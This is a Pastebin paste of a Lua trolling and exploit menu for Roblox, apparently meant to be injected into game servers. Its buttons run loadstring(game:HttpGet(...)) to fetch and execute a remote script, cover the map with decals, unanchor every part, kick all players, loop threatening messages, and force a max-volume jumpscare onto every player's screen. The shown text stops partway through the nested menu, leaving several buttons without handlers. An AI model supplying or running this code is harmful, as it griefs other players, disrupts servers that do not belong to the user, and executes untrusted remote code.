1x1x1x1 Gui Script modded by rey - Pastebin.com (2024)

  1. -- Gui to Lua

  2. -- Version: 3.

  3. -- Instances:

  4. local ScreenGui = Instance.new("ScreenGui")

  5. local Frame = Instance.new("Frame")

  6. local Name = Instance.new("TextLabel")

  7. local Credits = Instance.new("TextLabel")

  8. local e1x1x1x1Message = Instance.new("TextButton")

  9. local e1x1x1x1Music = Instance.new("TextButton")

  10. local e1x1x1x1Laugh = Instance.new("TextButton")

  11. local DayToNight = Instance.new("TextButton")

  12. local e666 = Instance.new("TextButton")

  13. local EpicSaxGuy = Instance.new("TextButton")

  14. local Disc0 = Instance.new("TextButton")

  15. local e2006Theme = Instance.new("TextButton")

  16. local ForceField = Instance.new("TextButton")

  17. --Properties:

  18. ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")

  19. ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

  20. Frame.Parent = ScreenGui

  21. Frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)

  22. Frame.Position = UDim2.new(0.382171214, 0, 0.328530252, 0)

  23. Frame.Size = UDim2.new(0, 378, 0, 250)

  24. Name.Name = "Name"

  25. Name.Parent = Frame

  26. Name.BackgroundColor3 = Color3.fromRGB(255, 0, 0)

  27. Name.Size = UDim2.new(0, 378, 0, 25)

  28. Name.Font = Enum.Font.GothamBold

  29. Name.Text = "Fe 1x1x1x1 Gui Modded"

  30. Name.TextColor3 = Color3.fromRGB(0, 0, 0)

  31. Name.TextScaled = true

  32. Name.TextSize = 14.000

  33. Name.TextWrapped = true

  34. Credits.Name = "Credits"

  35. Credits.Parent = Frame

  36. Credits.BackgroundColor3 = Color3.fromRGB(255, 0, 0)

  37. Credits.Position = UDim2.new(0, 0, 0.912, 0)

  38. Credits.Size = UDim2.new(0, 378, 0, 22)

  39. Credits.Font = Enum.Font.GothamBold

  40. Credits.Text = "By Rey"

  41. Credits.TextColor3 = Color3.fromRGB(0, 0, 0)

  42. Credits.TextScaled = true

  43. Credits.TextSize = 14.000

  44. Credits.TextWrapped = true

  45. e1x1x1x1Message.Name = "e1x1x1x1Message"

  46. e1x1x1x1Message.Parent = Frame

  47. e1x1x1x1Message.BackgroundColor3 = Color3.fromRGB(255, 0, 0)

  48. e1x1x1x1Message.Position = UDim2.new(0.0714285746, 0, 0.216000006, 0)

  49. e1x1x1x1Message.Size = UDim2.new(0, 79, 0, 31)

  50. e1x1x1x1Message.Font = Enum.Font.GothamBold

  51. e1x1x1x1Message.Text = "1x1x1x1 Message"

  52. e1x1x1x1Message.TextColor3 = Color3.fromRGB(0, 0, 0)

  53. e1x1x1x1Message.TextScaled = true

  54. e1x1x1x1Message.TextSize = 14.000

  55. e1x1x1x1Message.TextWrapped = true

  56. e1x1x1x1Message.MouseButton1Down:connect(function()

  57. while true do

  58. wait(12)--set this to how much time between messages

  59. msg = Instance.new ("Hint")

  60. msg.Parent = game.Workspace

  61. msg.Text = "1x1x1x1: MUHAWHAWHAW! NOOBS! I HAVE RETURNED FOR MY REVENGE!"

  62. wait(6)

  63. msg:remove()

  64. wait(3)

  65. msg = Instance.new("Message")

  66. msg.Parent = game.Workspace

  67. msg.Text = "1x1x1x1: NOW YOU WILL ALL PARISH IN MY FIRE OF DOOM!"

  68. wait(6)

  69. msg:remove()

  70. wait(3)

  71. msg = Instance.new("Message")

  72. msg.Parent = game.Workspace

  73. msg.Text = "1x1x1x1: I WILL DESTROY YOU ALL! YOU ARE WORTHLESS!"

  74. wait(6)

  75. msg:remove()

  76. wait(3)

  77. msg = Instance.new("Message")

  78. msg.Parent = game.Workspace

  79. msg.Text = "1x1x1x1: YOU WILL NOT LIVE THROUGH MY DEADLY ATTACKS!"

  80. wait(6)

  81. msg:remove()

  82. wait(3)

  83. msg = Instance.new("Message")

  84. msg.Parent = game.Workspace

  85. msg.Text = "1x1x1x1: I MIGHT AS WELL CLONE YOU INTO BOTS!"

  86. wait(6)

  87. msg:remove()

  88. wait(3)

  89. msg = Instance.new("Message")

  90. msg.Parent = game.Workspace

  91. msg.Text = "1x1x1x1: AND THEN THOSE BOTS WILL DESTROY ROBLOX! HAHAHAHAHA!"

  92. wait(6)

  93. msg:remove()

  94. wait(3)

  95. msg = Instance.new("Message")

  96. msg.Parent = game.Workspace

  97. msg.Text = "1x1x1x1: YOU CAN'T STOP ME! THERES NOTHING YOU CAN DO!"

  98. wait(6)

  99. msg:remove()

  100. end

  101. end)

  102. e1x1x1x1Music.Name = "e1x1x1x1Music"

  103. e1x1x1x1Music.Parent = Frame

  104. e1x1x1x1Music.BackgroundColor3 = Color3.fromRGB(255, 0, 0)

  105. e1x1x1x1Music.Position = UDim2.new(0.0714285746, 0, 0.436000019, 0)

  106. e1x1x1x1Music.Size = UDim2.new(0, 79, 0, 31)

  107. e1x1x1x1Music.Font = Enum.Font.GothamBold

  108. e1x1x1x1Music.Text = "iy"

  109. e1x1x1x1Music.TextColor3 = Color3.fromRGB(0, 0, 0)

  110. e1x1x1x1Music.TextScaled = true

  111. e1x1x1x1Music.TextSize = 14.000

  112. e1x1x1x1Music.TextWrapped = true

  113. e1x1x1x1Music.MouseButton1Down:connect(function()

  114. loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()

  115. end)

  116. e1x1x1x1Laugh.Name = "e1x1x1x1Laugh"

  117. e1x1x1x1Laugh.Parent = Frame

  118. e1x1x1x1Laugh.BackgroundColor3 = Color3.fromRGB(255, 0, 0)

  119. e1x1x1x1Laugh.Position = UDim2.new(0.0714285746, 0, 0.648000002, 0)

  120. e1x1x1x1Laugh.Size = UDim2.new(0, 79, 0, 34)

  121. e1x1x1x1Laugh.Font = Enum.Font.GothamBold

  122. e1x1x1x1Laugh.Text = "KOOPKIDD gui"

  123. e1x1x1x1Laugh.TextColor3 = Color3.fromRGB(0, 0, 0)

  124. e1x1x1x1Laugh.TextScaled = true

  125. e1x1x1x1Laugh.TextSize = 14.000

  126. e1x1x1x1Laugh.TextWrapped = true

  127. e1x1x1x1Laugh.MouseButton1Down:connect(function()

  128. -- Gui to Lua

  129. -- Version: 3.2

  130. -- Instances:

  131. local ScreenGui = Instance.new("ScreenGui")

  132. local ScrollingFrame = Instance.new("ScrollingFrame")

  133. local Title = Instance.new("TextLabel")

  134. local Title_2 = Instance.new("TextLabel")

  135. local Title_3 = Instance.new("TextLabel")

  136. local Title_4 = Instance.new("TextLabel")

  137. local Title_5 = Instance.new("TextLabel")

  138. local Decalspam1 = Instance.new("TextButton")

  139. local Musicplay = Instance.new("TextButton")

  140. local hint = Instance.new("TextButton")

  141. local _666 = Instance.new("TextButton")

  142. local Unanchor = Instance.new("TextButton")

  143. local Shutdown = Instance.new("TextButton")

  144. local disco = Instance.new("TextButton")

  145. local Particles = Instance.new("TextButton")

  146. local jumpscare = Instance.new("TextButton")

  147. local stopmusic = Instance.new("TextButton")

  148. local destroy = Instance.new("TextButton")

  149. local ss1 = Instance.new("TextButton")

  150. local ss2 = Instance.new("TextButton")

  151. local ss3 = Instance.new("TextButton")

  152. local flag = Instance.new("TextButton")

  153. --Properties:

  154. ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")

  155. ScrollingFrame.Parent = ScreenGui

  156. ScrollingFrame.Active = true

  157. ScrollingFrame.BackgroundColor3 = Color3.fromRGB(24, 24, 24)

  158. ScrollingFrame.BorderColor3 = Color3.fromRGB(0, 89, 29)

  159. ScrollingFrame.BorderSizePixel = 3

  160. ScrollingFrame.Position = UDim2.new(0.0700218678, 0, 0.49818182, 0)

  161. ScrollingFrame.Size = UDim2.new(0, 581, 0, 381)

  162. Title.Name = "Title"

  163. Title.Parent = ScrollingFrame

  164. Title.BackgroundColor3 = Color3.fromRGB(22, 22, 22)

  165. Title.BorderColor3 = Color3.fromRGB(12, 53, 6)

  166. Title.BorderSizePixel = 0

  167. Title.Position = UDim2.new(0.0859276503, 0, 0.00530304015, 0)

  168. Title.Size = UDim2.new(0, 480, 0, 50)

  169. Title.Font = Enum.Font.SourceSans

  170. Title.Text = "k00pgui 2v"

  171. Title.TextColor3 = Color3.fromRGB(255, 255, 255)

  172. Title.TextScaled = true

  173. Title.TextSize = 40.000

  174. Title.TextWrapped = true

  175. Title_2.Name = "Title"

  176. Title_2.Parent = Title

  177. Title_2.BackgroundColor3 = Color3.fromRGB(22, 22, 22)

  178. Title_2.BorderColor3 = Color3.fromRGB(12, 53, 6)

  179. Title_2.BorderSizePixel = 0

  180. Title_2.Position = UDim2.new(0.129268095, 0, 0.991363645, 0)

  181. Title_2.Size = UDim2.new(0, 380, 0, 14)

  182. Title_2.Font = Enum.Font.SourceSans

  183. Title_2.Text = "Inspired by BYTEGUI (made by team k00pkidd)"

  184. Title_2.TextColor3 = Color3.fromRGB(255, 255, 255)

  185. Title_2.TextScaled = true

  186. Title_2.TextSize = 40.000

  187. Title_2.TextWrapped = true

  188. Title_3.Name = "Title"

  189. Title_3.Parent = Title_2

  190. Title_3.BackgroundColor3 = Color3.fromRGB(22, 22, 22)

  191. Title_3.BorderColor3 = Color3.fromRGB(12, 53, 6)

  192. Title_3.BorderSizePixel = 0

  193. Title_3.Position = UDim2.new(0.0976891741, 0, 11.348506, 0)

  194. Title_3.Size = UDim2.new(0, 257, 0, 17)

  195. Title_3.Font = Enum.Font.SourceSans

  196. Title_3.Text = "Extra"

  197. Title_3.TextColor3 = Color3.fromRGB(255, 255, 255)

  198. Title_3.TextScaled = true

  199. Title_3.TextSize = 40.000

  200. Title_3.TextWrapped = true

  201. Title_4.Name = "Title"

  202. Title_4.Parent = Title_3

  203. Title_4.BackgroundColor3 = Color3.fromRGB(22, 22, 22)

  204. Title_4.BorderColor3 = Color3.fromRGB(12, 53, 6)

  205. Title_4.BorderSizePixel = 0

  206. Title_4.Position = UDim2.new(-0.00347813871, 0, 9.17203426, 0)

  207. Title_4.Size = UDim2.new(0, 257, 0, 17)

  208. Title_4.Font = Enum.Font.SourceSans

  209. Title_4.Text = "SS Scripts"

  210. Title_4.TextColor3 = Color3.fromRGB(255, 255, 255)

  211. Title_4.TextScaled = true

  212. Title_4.TextSize = 40.000

  213. Title_4.TextWrapped = true

  214. Title_5.Name = "Title"

  215. Title_5.Parent = Title_4

  216. Title_5.BackgroundColor3 = Color3.fromRGB(22, 22, 22)

  217. Title_5.BorderColor3 = Color3.fromRGB(12, 53, 6)

  218. Title_5.BorderSizePixel = 0

  219. Title_5.Position = UDim2.new(0.00819501281, 0, 4.99556398, 0)

  220. Title_5.Size = UDim2.new(0, 257, 0, 17)

  221. Title_5.Font = Enum.Font.SourceSans

  222. Title_5.Text = "Epok tr0lls!111"

  223. Title_5.TextColor3 = Color3.fromRGB(255, 255, 255)

  224. Title_5.TextScaled = true

  225. Title_5.TextSize = 40.000

  226. Title_5.TextWrapped = true

  227. Decalspam1.Name = "Decalspam1"

  228. Decalspam1.Parent = Title

  229. Decalspam1.BackgroundColor3 = Color3.fromRGB(0, 0, 0)

  230. Decalspam1.BorderColor3 = Color3.fromRGB(5, 54, 0)

  231. Decalspam1.BorderSizePixel = 2

  232. Decalspam1.Position = UDim2.new(-0.0170997158, 0, 1.4345454, 0)

  233. Decalspam1.Size = UDim2.new(0, 147, 0, 47)

  234. Decalspam1.Font = Enum.Font.SourceSans

  235. Decalspam1.Text = "Decal Spam 1"

  236. Decalspam1.TextColor3 = Color3.fromRGB(255, 255, 255)

  237. Decalspam1.TextScaled = true

  238. Decalspam1.TextSize = 14.000

  239. Decalspam1.TextWrapped = true

  240. Musicplay.Name = "Musicplay"

  241. Musicplay.Parent = Title

  242. Musicplay.BackgroundColor3 = Color3.fromRGB(0, 0, 0)

  243. Musicplay.BorderColor3 = Color3.fromRGB(5, 54, 0)

  244. Musicplay.BorderSizePixel = 2

  245. Musicplay.Position = UDim2.new(0.32456696, 0, 1.4345454, 0)

  246. Musicplay.Size = UDim2.new(0, 147, 0, 47)

  247. Musicplay.Font = Enum.Font.SourceSans

  248. Musicplay.Text = "Music Play"

  249. Musicplay.TextColor3 = Color3.fromRGB(255, 255, 255)

  250. Musicplay.TextScaled = true

  251. Musicplay.TextSize = 14.000

  252. Musicplay.TextWrapped = true

  253. hint.Name = "hint"

  254. hint.Parent = Title

  255. hint.BackgroundColor3 = Color3.fromRGB(0, 0, 0)

  256. hint.BorderColor3 = Color3.fromRGB(5, 54, 0)

  257. hint.BorderSizePixel = 2

  258. hint.Position = UDim2.new(0.66831696, 0, 1.4345454, 0)

  259. hint.Size = UDim2.new(0, 147, 0, 47)

  260. hint.Font = Enum.Font.SourceSans

  261. hint.Text = "Hint"

  262. hint.TextColor3 = Color3.fromRGB(255, 255, 255)

  263. hint.TextScaled = true

  264. hint.TextSize = 14.000

  265. hint.TextWrapped = true

  266. _666.Name = "666"

  267. _666.Parent = Title

  268. _666.BackgroundColor3 = Color3.fromRGB(0, 0, 0)

  269. _666.BorderColor3 = Color3.fromRGB(5, 54, 0)

  270. _666.BorderSizePixel = 2

  271. _666.Position = UDim2.new(-0.017099686, 0, 2.97454548, 0)

  272. _666.Size = UDim2.new(0, 147, 0, 47)

  273. _666.Font = Enum.Font.SourceSans

  274. _666.Text = "666"

  275. _666.TextColor3 = Color3.fromRGB(255, 255, 255)

  276. _666.TextScaled = true

  277. _666.TextSize = 14.000

  278. _666.TextWrapped = true

  279. Unanchor.Name = "Unanchor"

  280. Unanchor.Parent = Title

  281. Unanchor.BackgroundColor3 = Color3.fromRGB(0, 0, 0)

  282. Unanchor.BorderColor3 = Color3.fromRGB(5, 54, 0)

  283. Unanchor.BorderSizePixel = 2

  284. Unanchor.Position = UDim2.new(0.322483659, 0, 2.97454548, 0)

  285. Unanchor.Size = UDim2.new(0, 147, 0, 47)

  286. Unanchor.Font = Enum.Font.SourceSans

  287. Unanchor.Text = "UnAnchor Parts"

  288. Unanchor.TextColor3 = Color3.fromRGB(255, 255, 255)

  289. Unanchor.TextScaled = true

  290. Unanchor.TextSize = 14.000

  291. Unanchor.TextWrapped = true

  292. Shutdown.Name = "Shutdown"

  293. Shutdown.Parent = Title

  294. Shutdown.BackgroundColor3 = Color3.fromRGB(0, 0, 0)

  295. Shutdown.BorderColor3 = Color3.fromRGB(5, 54, 0)

  296. Shutdown.BorderSizePixel = 2

  297. Shutdown.Position = UDim2.new(0.66831696, 0, 2.97454548, 0)

  298. Shutdown.Size = UDim2.new(0, 147, 0, 47)

  299. Shutdown.Font = Enum.Font.SourceSans

  300. Shutdown.Text = "Shutdown"

  301. Shutdown.TextColor3 = Color3.fromRGB(255, 255, 255)

  302. Shutdown.TextScaled = true

  303. Shutdown.TextSize = 14.000

  304. Shutdown.TextWrapped = true

  305. disco.Name = "disco"

  306. disco.Parent = Title

  307. disco.BackgroundColor3 = Color3.fromRGB(0, 0, 0)

  308. disco.BorderColor3 = Color3.fromRGB(5, 54, 0)

  309. disco.BorderSizePixel = 2

  310. disco.Position = UDim2.new(-0.0170996785, 0, 4.79454565, 0)

  311. disco.Size = UDim2.new(0, 147, 0, 47)

  312. disco.Font = Enum.Font.SourceSans

  313. disco.Text = "Disco"

  314. disco.TextColor3 = Color3.fromRGB(255, 255, 255)

  315. disco.TextScaled = true

  316. disco.TextSize = 14.000

  317. disco.TextWrapped = true

  318. Particles.Name = "Particles"

  319. Particles.Parent = Title

  320. Particles.BackgroundColor3 = Color3.fromRGB(0, 0, 0)

  321. Particles.BorderColor3 = Color3.fromRGB(5, 54, 0)

  322. Particles.BorderSizePixel = 2

  323. Particles.Position = UDim2.new(0.326650321, 0, 4.79454565, 0)

  324. Particles.Size = UDim2.new(0, 147, 0, 47)

  325. Particles.Font = Enum.Font.SourceSans

  326. Particles.Text = "Particles"

  327. Particles.TextColor3 = Color3.fromRGB(255, 255, 255)

  328. Particles.TextScaled = true

  329. Particles.TextSize = 14.000

  330. Particles.TextWrapped = true

  331. jumpscare.Name = "jumpscare"

  332. jumpscare.Parent = Title

  333. jumpscare.BackgroundColor3 = Color3.fromRGB(0, 0, 0)

  334. jumpscare.BorderColor3 = Color3.fromRGB(5, 54, 0)

  335. jumpscare.BorderSizePixel = 2

  336. jumpscare.Position = UDim2.new(0.666233659, 0, 4.79454565, 0)

  337. jumpscare.Size = UDim2.new(0, 147, 0, 47)

  338. jumpscare.Font = Enum.Font.SourceSans

  339. jumpscare.Text = "Jumpscare FE"

  340. jumpscare.TextColor3 = Color3.fromRGB(255, 255, 255)

  341. jumpscare.TextScaled = true

  342. jumpscare.TextSize = 14.000

  343. jumpscare.TextWrapped = true

  344. stopmusic.Name = "stopmusic"

  345. stopmusic.Parent = Title

  346. stopmusic.BackgroundColor3 = Color3.fromRGB(0, 0, 0)

  347. stopmusic.BorderColor3 = Color3.fromRGB(5, 54, 0)

  348. stopmusic.BorderSizePixel = 2

  349. stopmusic.Position = UDim2.new(-0.060849756, 0, -0.00545477867, 0)

  350. stopmusic.Size = UDim2.new(0, 91, 0, 20)

  351. stopmusic.Font = Enum.Font.SourceSans

  352. stopmusic.Text = "Stop Music"

  353. stopmusic.TextColor3 = Color3.fromRGB(255, 255, 255)

  354. stopmusic.TextScaled = true

  355. stopmusic.TextSize = 14.000

  356. stopmusic.TextWrapped = true

  357. destroy.Name = "destroy"

  358. destroy.Parent = Title

  359. destroy.BackgroundColor3 = Color3.fromRGB(0, 0, 0)

  360. destroy.BorderColor3 = Color3.fromRGB(5, 54, 0)

  361. destroy.BorderSizePixel = 2

  362. destroy.Position = UDim2.new(-0.017099699, 0, 6.21454525, 0)

  363. destroy.Size = UDim2.new(0, 476, 0, 47)

  364. destroy.Font = Enum.Font.SourceSans

  365. destroy.Text = "Destroy Complete (ONLY FOR EMERGENCY)"

  366. destroy.TextColor3 = Color3.fromRGB(255, 255, 255)

  367. destroy.TextScaled = true

  368. destroy.TextSize = 14.000

  369. destroy.TextWrapped = true

  370. ss1.Name = "ss1"

  371. ss1.Parent = Title

  372. ss1.BackgroundColor3 = Color3.fromRGB(0, 0, 0)

  373. ss1.BorderColor3 = Color3.fromRGB(5, 54, 0)

  374. ss1.BorderSizePixel = 2

  375. ss1.Position = UDim2.new(-0.0170996785, 0, 7.75454617, 0)

  376. ss1.Size = UDim2.new(0, 147, 0, 47)

  377. ss1.Font = Enum.Font.SourceSans

  378. ss1.Text = "c00lgui"

  379. ss1.TextColor3 = Color3.fromRGB(255, 255, 255)

  380. ss1.TextScaled = true

  381. ss1.TextSize = 14.000

  382. ss1.TextWrapped = true

  383. ss2.Name = "ss2"

  384. ss2.Parent = Title

  385. ss2.BackgroundColor3 = Color3.fromRGB(0, 0, 0)

  386. ss2.BorderColor3 = Color3.fromRGB(5, 54, 0)

  387. ss2.BorderSizePixel = 2

  388. ss2.Position = UDim2.new(0.326650321, 0, 7.75454617, 0)

  389. ss2.Size = UDim2.new(0, 147, 0, 47)

  390. ss2.Font = Enum.Font.SourceSans

  391. ss2.Text = "game cursor gui"

  392. ss2.TextColor3 = Color3.fromRGB(255, 255, 255)

  393. ss2.TextScaled = true

  394. ss2.TextSize = 14.000

  395. ss2.TextWrapped = true

  396. ss3.Name = "ss3"

  397. ss3.Parent = Title

  398. ss3.BackgroundColor3 = Color3.fromRGB(0, 0, 0)

  399. ss3.BorderColor3 = Color3.fromRGB(5, 54, 0)

  400. ss3.BorderSizePixel = 2

  401. ss3.Position = UDim2.new(0.666233659, 0, 7.75454617, 0)

  402. ss3.Size = UDim2.new(0, 147, 0, 47)

  403. ss3.Font = Enum.Font.SourceSans

  404. ss3.Text = "BYTEGUI"

  405. ss3.TextColor3 = Color3.fromRGB(255, 255, 255)

  406. ss3.TextScaled = true

  407. ss3.TextSize = 14.000

  408. ss3.TextWrapped = true

  409. flag.Name = "flag"

  410. flag.Parent = Title

  411. flag.BackgroundColor3 = Color3.fromRGB(0, 0, 0)

  412. flag.BorderColor3 = Color3.fromRGB(5, 54, 0)

  413. flag.BorderSizePixel = 2

  414. flag.Position = UDim2.new(-0.019183049, 0, 9.33454514, 0)

  415. flag.Size = UDim2.new(0, 147, 0, 47)

  416. flag.Font = Enum.Font.SourceSans

  417. flag.Text = "Funni German Flag Skybox"

  418. flag.TextColor3 = Color3.fromRGB(255, 255, 255)

  419. flag.TextScaled = true

  420. flag.TextSize = 14.000

  421. flag.TextWrapped = true

  422. -- Scripts:

  423. local function LQCL_fake_script() -- ScrollingFrame.Drag Gui Script

  424. local script = Instance.new('LocalScript', ScrollingFrame)

  425. function dragify(Main)

  426. dragToggle = nil

  427. dragSpeed = 0.95 -- You can edit this.

  428. dragInput = nil

  429. dragStart = nil

  430. dragPos = nil

  431. function updateInput(input)

  432. Delta = input.Position - dragStart

  433. Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + Delta.X, startPos.Y.Scale, startPos.Y.Offset + Delta.Y)

  434. game:GetService("TweenService"):Create(Main, TweenInfo.new(.25), {Position = Position}):Play()

  435. end

  436. Main.InputBegan:Connect(function(input)

  437. if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) then

  438. dragToggle = true

  439. dragStart = input.Position

  440. startPos = Main.Position

  441. input.Changed:Connect(function()

  442. if (input.UserInputState == Enum.UserInputState.End) then

  443. dragToggle = false

  444. end

  445. end)

  446. end

  447. end)

  448. Main.InputChanged:Connect(function(input)

  449. if (input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch) then

  450. dragInput = input

  451. end

  452. end)

  453. game:GetService("UserInputService").InputChanged:Connect(function(input)

  454. if (input == dragInput and dragToggle) then

  455. updateInput(input)

  456. end

  457. end)

  458. end

  459. dragify(script.Parent)

  460. end

  461. coroutine.wrap(LQCL_fake_script)()

  462. local function EGNFAEB_fake_script() -- Decalspam1.Script

  463. local script = Instance.new('Script', Decalspam1)

  464. function click()

  465. s = Instance.new("Sky")

  466. s.Name = "Sky"

  467. s.Parent = game.Lighting

  468. s.SkyboxBk = "http://www.roblox.com/asset/?id=9422866248"

  469. s.SkyboxDn = "http://www.roblox.com/asset/?id=9422866248"

  470. s.SkyboxFt = "http://www.roblox.com/asset/?id=9422866248"

  471. s.SkyboxLf = "http://www.roblox.com/asset/?id=9422866248"

  472. s.SkyboxRt = "http://www.roblox.com/asset/?id=9422866248"

  473. s.SkyboxUp = "http://www.roblox.com/asset/?id=9422866248"

  474. game.Lighting.TimeOfDay = 12

  475. end

  476. script.Parent.MouseButton1Down:connect(click)

  477. end

  478. coroutine.wrap(EGNFAEB_fake_script)()

  479. local function OLKRHI_fake_script() -- Decalspam1.Script

  480. local script = Instance.new('Script', Decalspam1)

  481. function click()

  482. function exPro(root)

  483. for _, v in pairs(root:GetChildren()) do

  484. if v:IsA("Decal") and v.Texture ~= "http://www.roblox.com/asset/?id=9422866248" then

  485. v.Parent = nil

  486. elseif v:IsA("BasePart") then

  487. v.Material = "Plastic"

  488. v.Transparency = 0

  489. local One = Instance.new("Decal", v)

  490. local Two = Instance.new("Decal", v)

  491. local Three = Instance.new("Decal", v)

  492. local Four = Instance.new("Decal", v)

  493. local Five = Instance.new("Decal", v)

  494. local Six = Instance.new("Decal", v)

  495. One.Texture = "http://www.roblox.com/asset/?id=9422866248"

  496. Two.Texture = "http://www.roblox.com/asset/?id=9422866248"

  497. Three.Texture = "http://www.roblox.com/asset/?id=9422866248"

  498. Four.Texture = "http://www.roblox.com/asset/?id=9422866248"

  499. Five.Texture = "http://www.roblox.com/asset/?id=9422866248"

  500. Six.Texture = "http://www.roblox.com/asset/?id=9422866248"

  501. One.Face = "Front"

  502. Two.Face = "Back"

  503. Three.Face = "Right"

  504. Four.Face = "Left"

  505. Five.Face = "Top"

  506. Six.Face = "Bottom"

  507. end

  508. exPro(v)

  509. end

  510. end

  511. function asdf(root)

  512. for _, v in pairs(root:GetChildren()) do

  513. asdf(v)

  514. end

  515. end

  516. exPro(game.Workspace)

  517. asdf(game.Workspace)

  518. end

  519. script.Parent.MouseButton1Down:connect(click)

  520. end

  521. coroutine.wrap(OLKRHI_fake_script)()

  522. local function WGLXH_fake_script() -- Musicplay.Script

  523. local script = Instance.new('Script', Musicplay)

  524. function onClick()

  525. Instance.new("Sound").Parent = game.Workspace game.Workspace.Sound.SoundId ="rbxassetid://7177681888" game.Workspace.Sound.Looped=true game.Workspace.Sound:Play()

  526. end

  527. script.Parent.MouseButton1Down:connect(onClick)

  528. end

  529. coroutine.wrap(WGLXH_fake_script)()

  530. local function WXIYR_fake_script() -- hint.Script

  531. local script = Instance.new('Script', hint)

  532. script.Parent.MouseButton1Click:Connect(function()

  533. local m = Instance.new("Hint", game.workspace)

  534. m.Text = " This Game Is Doomed By Team k00pkidd & c00lkidd"

  535. end)

  536. end

  537. coroutine.wrap(WXIYR_fake_script)()

  538. local function EYGTMT_fake_script() -- _666.Script

  539. local script = Instance.new('Script', _666)

  540. script.Parent.MouseButton1Click:Connect(function()

  541. for i,v in next,workspace:children''do

  542. if(v:IsA'BasePart')then

  543. me=v;

  544. bbg=Instance.new('BillboardGui',me);

  545. bbg.Name='stuf';

  546. bbg.Adornee=me;

  547. bbg.Size=UDim2.new(2.5,0,2.5,0)

  548. --bbg.StudsOffset=Vector3.new(0,2,0)

  549. tlb=Instance.new'TextLabel';

  550. tlb.Text='666 666 666 666 666 666';

  551. tlb.Font='SourceSansBold';

  552. tlb.FontSize='Size48';

  553. tlb.TextColor3=Color3.new(1,0,0);

  554. tlb.Size=UDim2.new(1.25,0,1.25,0);

  555. tlb.Position=UDim2.new(-0.125,-22,-1.1,0);

  556. tlb.BackgroundTransparency=1;

  557. tlb.Parent=bbg;

  558. end;end;

  559. function xds(dd)

  560. for i,v in next,dd:children''do

  561. if(v:IsA'BasePart')then

  562. v.BrickColor=BrickColor.new'Really black';

  563. v.TopSurface='Smooth';

  564. v.BottomSurface='Smooth';

  565. s=Instance.new('SelectionBox',v);

  566. s.Adornee=v;

  567. s.Color=BrickColor.new'Really red';

  568. a=Instance.new('PointLight',v);

  569. a.Color=Color3.new(1,0,0);

  570. a.Range=15;

  571. a.Brightness=5;

  572. f=Instance.new('Fire',v);

  573. f.Size=19;

  574. f.Heat=22;

  575. end;

  576. local dec = 'http://www.roblox.com/asset/?id=19399245';

  577. local fac = {'Front', 'Back', 'Left', 'Right', 'Top', 'Bottom'}

  578. --coroutine.wrap(function()

  579. --for ,_ in pairs(fac) do

  580. --local ddec = Instance.new("Decal", v)

  581. --ddec.Face =

  582. --ddec.Texture = dec

  583. --end end)()

  584. if #(v:GetChildren())>0 then

  585. xds(v)

  586. end

  587. end

  588. end

  589. xds(game.Workspace)

  590. end)

  591. end

  592. coroutine.wrap(EYGTMT_fake_script)()

  593. local function EXDQQ_fake_script() -- Unanchor.Script

  594. local script = Instance.new('Script', Unanchor)

  595. script.Parent.MouseButton1Down:Connect(function()

  596. for i,v in pairs(game.Workspace:GetDescendants()) do

  597. if v:IsA("BasePart") then

  598. v.Anchored = false

  599. end

  600. end

  601. for i,v in pairs(game.ReplicatedStorage:GetDescendants()) do

  602. if v:IsA("BasePart") then

  603. v.Anchored = false

  604. end

  605. end

  606. for i,v in pairs(game.ReplicatedFirst:GetDescendants()) do

  607. if v:IsA("BasePart") then

  608. v.Anchored = false

  609. end

  610. end

  611. end)

  612. end

  613. coroutine.wrap(EXDQQ_fake_script)()

  614. local function PGJMH_fake_script() -- Shutdown.Script

  615. local script = Instance.new('Script', Shutdown)

  616. script.Parent.MouseButton1Down:connect(function()

  617. for i, players in pairs(game.Players:GetChildren()) do

  618. players:Kick("Teh Game Iz f*cked Up!!!!111")

  619. end

  620. end)

  621. end

  622. coroutine.wrap(PGJMH_fake_script)()

  623. local function ROIXGS_fake_script() -- disco.Script

  624. local script = Instance.new('Script', disco)

  625. script.Parent.MouseButton1Click:Connect(function()

  626. local Lighting = game:GetService("Lighting")

  627. local ColorCorrection = Instance.new("ColorCorrectionEffect", Lighting)

  628. function zigzag(X)

  629. return math.acos(math.cos(X*math.pi))/math.pi

  630. end

  631. Counter = 0

  632. Lighting.TimeOfDay = "12:00"

  633. while wait(0.1) do

  634. ColorCorrection.TintColor = Color3.fromHSV(zigzag(Counter),1,1)

  635. Lighting.Ambient = Color3.fromHSV(zigzag(Counter),1,1)

  636. Counter += 0.01

  637. end

  638. end)

  639. end

  640. coroutine.wrap(ROIXGS_fake_script)()

  641. local function NIMQSV_fake_script() -- Particles.Script

  642. local script = Instance.new('Script', Particles)

  643. script.Parent.MouseButton1Click:Connect(function()

  644. for i, v in pairs(game.Players:GetChildren()) do

  645. emit = Instance.new("ParticleEmitter")

  646. emit.Parent = v.Character.Head

  647. emit.Texture = "http://www.roblox.com/asset/?id=9698929683"

  648. emit.VelocitySpread = 100000

  649. end

  650. end)

  651. end

  652. coroutine.wrap(NIMQSV_fake_script)()

  653. local function JQMPQN_fake_script() -- jumpscare.Script

  654. local script = Instance.new('Script', jumpscare)

  655. script.Parent.MouseButton1Click:Connect(function()

  656. for i,v in pairs(game.Players:GetPlayers()) do

  657. if v.Name ~= me and not v.PlayerGui:FindFirstChild("Screamer") and v:FindFirstChild("PlayerGui") then

  658. spawn(function()

  659. local newgui = Instance.new("ScreenGui",v.PlayerGui)

  660. newgui.Name = "Screamer"

  661. local newimage = Instance.new("ImageLabel",newgui)

  662. newimage.Image = "http://www.roblox.com/asset/?id=9018233362"

  663. newimage.Size = UDim2.new(1,1,1,1)

  664. local s = Instance.new("Sound",newgui)

  665. s.SoundId = "rbxassetid://9069609200"

  666. s.Volume = 9999999999999999999999999999999999999

  667. s.Looped = true

  668. s:Play()

  669. print("Screamed "..v.Name)

  670. while wait(9) do

  671. newimage.Parent:Destroy()

  672. end

  673. end)

  674. end

  675. end

  676. end)

  677. end

